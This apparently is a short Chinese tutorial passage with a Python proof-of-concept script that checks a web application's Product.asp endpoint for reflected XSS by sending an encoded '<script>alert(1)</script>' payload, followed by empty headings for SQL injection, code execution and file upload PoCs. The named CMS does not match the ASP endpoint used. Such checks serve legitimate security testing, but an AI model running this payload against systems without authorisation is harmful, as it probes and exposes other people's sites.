python2 与python3使用的模块略有不同
1、反射型xss的poc,以骑士cms的反射型xss为例
# coding=utf-8
from urllib import request
import sys
# https://blog.csdn.net/jiduochou963/article/details/87564467
# http://www.onescorpion.com/research/poc.html
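def xss_poc(url, timeout=10):
    """Check whether *url* reflects the page's known XSS marker unencoded.

    Issues one GET to the ``Product.asp`` endpoint with an ``alert(1)``
    marker in the query string and reports, on stdout, whether the marker
    comes back verbatim in the response body.  Nothing is returned; the
    function only prints.

    Args:
        url: Base URL of the host to check (scheme and host, no trailing
            path); the endpoint path is appended as-is.
        timeout: Seconds to wait for the HTTP response.  The original call
            had no timeout, so an unresponsive host hung the script
            indefinitely.
    """
    target = url + r"/Product.asp?BigClassName=%C4%A5%BB%FA%3Cscript%3Ealert(1)%3C/script%3E&Smallclassname=%C1%A2%C4%A5"
    try:
        req = request.Request(target)  # build the request
        # read() yields bytes, so the marker is compared as a bytes literal
        # rather than decoding the body with a guessed charset.
        result = request.urlopen(req, timeout=timeout).read()
        if b'<script>alert(1)</script>' in result:
            print("%s is vulnerable!" % url)
            print("payload:\n",target)
        else:
            print("%s is not vulnerable!"% url)
    except Exception as e:
        # Best-effort check: any network or HTTP failure is reported on
        # stdout instead of propagating to the caller.
        print('something is wrong..')
        print(e)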
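argvs = sys.argv
if len(argvs) == 2:
    url = argvs[1]
else:
    # Without a target there is nothing to check.  The original printed the
    # usage line and then still called xss_poc(url) with `url` unbound,
    # which raised a NameError instead of exiting cleanly.
    print('usage: python %s url' % argvs[0])
    sys.exit(1)
xss_poc(url)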
poc验证结果:
2、存储型xss的poc
3、get方式SQL注入
4、post方式SQL注入
5、代码执行
6、文件上传